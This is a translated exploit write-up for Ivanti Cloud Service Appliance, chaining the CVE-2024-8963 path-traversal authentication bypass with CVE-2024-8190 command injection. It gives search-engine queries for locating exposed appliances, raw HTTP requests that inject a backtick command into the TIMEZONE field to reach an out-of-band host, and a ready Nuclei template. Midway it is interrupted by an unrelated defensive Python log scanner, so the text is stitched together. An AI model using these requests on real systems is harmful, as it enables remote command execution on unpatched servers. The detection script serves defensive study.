[Vulnerability Reproduction] CVE-2024-8963, CVE-2024-8190
Original | 混子Hacker | 2024-12-17 09:56
Disclaimer
Do not use the techniques in this article for illegal testing. Any direct or indirect consequences and losses arising from the dissemination or use of the information or tools provided in this article are the sole responsibility of the user; the author bears no legal or joint liability.
Vulnerability overview
"We have to do it quietly; if we lose, we act as if it never happened." (quoted from Lei Jun)
Ivanti Cloud Service Appliance
Ivanti Cloud Service Appliance is an integrated management platform used mainly to support IT service management and the automation of cloud services; it is designed to help enterprises simplify and automate IT processes and improve operational efficiency. Ivanti Cloud Services Appliance (CSA) 4.6 prior to Patch 519 contains CVE-2024-8963, a path traversal vulnerability, and CVE-2024-8190, a command execution vulnerability.
Vulnerability details
01 Asset reconnaissance
fofa: app="Ivanti(R)-Cloud-Services-Appliance"
Quake:app: "Ivanti Endpoint Manager (EPM)"
# Rain or shine, I'm waiting for you on Quake. Enter the invite code "lnBNF0" in your profile and we each get 5,000 permanent points; address: quake.360.net
02 Vulnerability reproduction
GET /client/index.php%3F.php/gsb/users.php HTTP/1.1
Host: xxx
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8
Cookie: LDCSASESSID=kt57k50mb3m48giosk8pikfpk5
CVE-2024-8963 path traversal
Bypasses the permission check to reach the backend and obtain sensitive data.
CVE-2024-8190 command execution
First, use CVE-2024-8963 above to obtain the LDCSA_CSRF token and the cookie value.
Then, carrying that cookie and LDCSA_CSRF, use CVE-2024-8963 again to reach /gsb/datetime.php and execute commands.
POST /client/index.php%3F.php/gsb/datetime.php HTTP/1.1
Host: xxx
Connection: keep-alive
Content-Length: 211
Cache-Control: max-age=0
sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Origin: null
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8
Cookie: LDCSASESSID=f1o2t0t15fi2cdb7pautdgtin2
dateTimeFormSubmitted=1&LDCSA_CSRF=sid:eb6f7c1771acf1f001d1b78059e0e048bbcd2122,1734425798&CMONTH=12&CDAY=17&CYEAR=2024&CHOUR=16&CMIN=30&TIMEZONE=;`ping -c2 -w2 thomas.504c79ddf1.ipv6.1433.eu.org`;&SUBMIT_TIME=Save
The DNSLog platform receives the response.
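From a defender's side, the two requests above leave a recognisable trace in the web server access log: a percent-encoded "?" glued to index.php so that the decoded path reads index.php?.php/gsb/..., and, for the command-injection step, a POST to /gsb/datetime.php through that same path. The following Python script is an added example written for this article, not code from the original post or from Ivanti; it scans access-log lines in the common combined format for those two indicators. The log lines are constructed samples that only mirror the request paths shown above, and the IP addresses, timestamps and sizes are made up.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in combined access-log format; they are not real
# traffic and only mirror the request paths shown in the article above.
SAMPLE_LOG = """\
203.0.113.10 - - [17/Dec/2024:09:56:01 +0800] "GET /client/index.php%3F.php/gsb/users.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.10 - - [17/Dec/2024:09:56:05 +0800] "POST /client/index.php%3F.php/gsb/datetime.php HTTP/1.1" 200 310 "-" "Mozilla/5.0"
203.0.113.10 - - [17/Dec/2024:09:56:09 +0800] "GET /client/index.php%253F.php/gsb/users.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [17/Dec/2024:10:01:00 +0800] "GET /client/index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
198.51.100.7 - - [17/Dec/2024:10:01:30 +0800] "POST /gsb/datetime.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
not a log line
"""

# Combined log format: client ip, identity, user, [timestamp], "METHOD path proto", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# The bypass in the article glues an encoded '?' to index.php so that the
# decoded path reads "index.php?.php/gsb/<script>"; that is the indicator.
BYPASS_RE = re.compile(r'/index\.php\?\.php/', re.IGNORECASE)


def fully_decode(path, rounds=3):
    """Percent-decode repeatedly (bounded) so a double-encoded '?' (%253F) is also caught."""
    for _ in range(rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def classify(line):
    """Return a finding dict for a suspicious access-log line, or None for a benign/unparsable one."""
    m = LOG_RE.match(line)
    if not m:
        return None
    decoded = fully_decode(m.group('path'))
    if not BYPASS_RE.search(decoded):
        return None
    finding = 'CVE-2024-8963 auth bypass (index.php%3F.php path)'
    # A POST to the date/time handler through the bypass is the pattern the
    # article uses to reach CVE-2024-8190 command execution.
    if m.group('method') == 'POST' and decoded.lower().endswith('/gsb/datetime.php'):
        finding = 'CVE-2024-8190 command injection attempt via CVE-2024-8963'
    return {
        'ip': m.group('ip'),
        'time': m.group('ts'),
        'method': m.group('method'),
        'path': m.group('path'),
        'status': int(m.group('status')),
        'finding': finding,
    }


def scan(log_text):
    """Scan a whole access log and return the findings in log order."""
    return [f for f in (classify(line) for line in log_text.splitlines()) if f]


if __name__ == '__main__':
    for f in scan(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} {f['method']} {f['path']} -> {f['finding']}")
```

The plain POST to /gsb/datetime.php in the fourth sample line is deliberately not flagged: without the index.php%3F.php prefix it is an ordinary request that the appliance's authentication check still covers, which is why matching on the decoded bypass path rather than on the script name alone keeps false positives down. The bounded repeated decoding makes sure a double-encoded variant of the same path is not missed.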
03 Nuclei PoC
id: CVE-2024-8963_8190
info:
  name: CVE-2024-8963_8190
  author: Thomas
  severity: high
  description: Ivanti Cloud Service Appliance Path Traversal AND RCE
  tags: Ivanti
  metadata:
    fofa-query: app="Ivanti(R)-Cloud-Services-Appliance"
requests:
  - raw:
      - |
        GET /client/index.php%3F.php/gsb/users.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
      - |
        POST /client/index.php%3F.php/gsb/datetime.php HTTP/1.1
        Host: {{Hostname}}
        Origin: null
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Cookie: {{cookie}}

        dateTimeFormSubmitted=1&LDCSA_CSRF={{LDCSA_CSRF}}&CMONTH=12&CDAY=17&CYEAR=2024&CHOUR=16&CMIN=30&TIMEZONE=;`ping -c2 -w2 yourdnslog`;&SUBMIT_TIME=Save
    matchers-condition: and
    extractors:
      - type: regex
        name: cookie
        part: header
        group: 1
        internal: true
        regex:
          - "Set-Cookie:(.*?);"
      - type: regex
        name: LDCSA_CSRF
        part: body
        internal: true
        group: 1
        regex:
          - 'name=''LDCSA_CSRF'' value="(.*?)"'
    matchers:
      - type: status
        status:
          - 200
Original article | please include a link to the original source when reposting
More vulnerabilities | follow the author
Author | 混子Hacker